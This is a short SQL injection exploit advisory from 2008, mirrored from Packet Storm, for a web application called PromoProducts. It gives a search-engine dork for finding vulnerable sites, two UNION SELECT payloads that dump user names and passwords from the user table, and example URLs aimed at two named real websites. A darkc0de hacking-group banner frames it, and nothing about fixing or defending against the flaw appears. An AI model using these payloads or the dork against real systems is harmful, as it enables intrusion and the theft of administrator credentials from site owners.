Lucene search

K

promoproducts-sql.txt

🗓️ 16 Aug 2008 00:00:00Reported by baltazarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

PromoProducts security vulnerability sql injectio

Show more
Code
`################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #   
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear --- #  
################################################################   
#   
# Author: baltazar and sinner_01   
#   
# Home : www.darkc0de.com & ljuska.org  
#   
# Email : [email protected], [email protected]  
#   
# Share the c0de!   
#   
################################################################   
#   
# App Name: PromoProducts  
#   
#   
# Dork: inurl:/view_product.php?cat_id= sub_cat  
#   
# POC:-9999+union+all+select+1,2,3,4,5,6,7,concat(user_name,char(58),password),9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26+from+user--  
#  
P0C-2:-9999+union+all+select+1,concat(user_name,char(58),password),null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user--  
#  
#Example:  
# http://www.number1promotions.com/view_product.php?cat_id=155&sub_cat=-9999+union+all+select+1,2,3,4,5,6,7,concat(user_name,char(58),password),9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26+from+user--  
#   
http://fastproductsupplies.com/view_product.php?cat_id=6500&sub_cat=6508&product_id=-9999+union+all+select+1,concat(user_name,char(58),password),null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user--  
#  
################################################################   
# Vuln Discovered 04/14/2008   
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo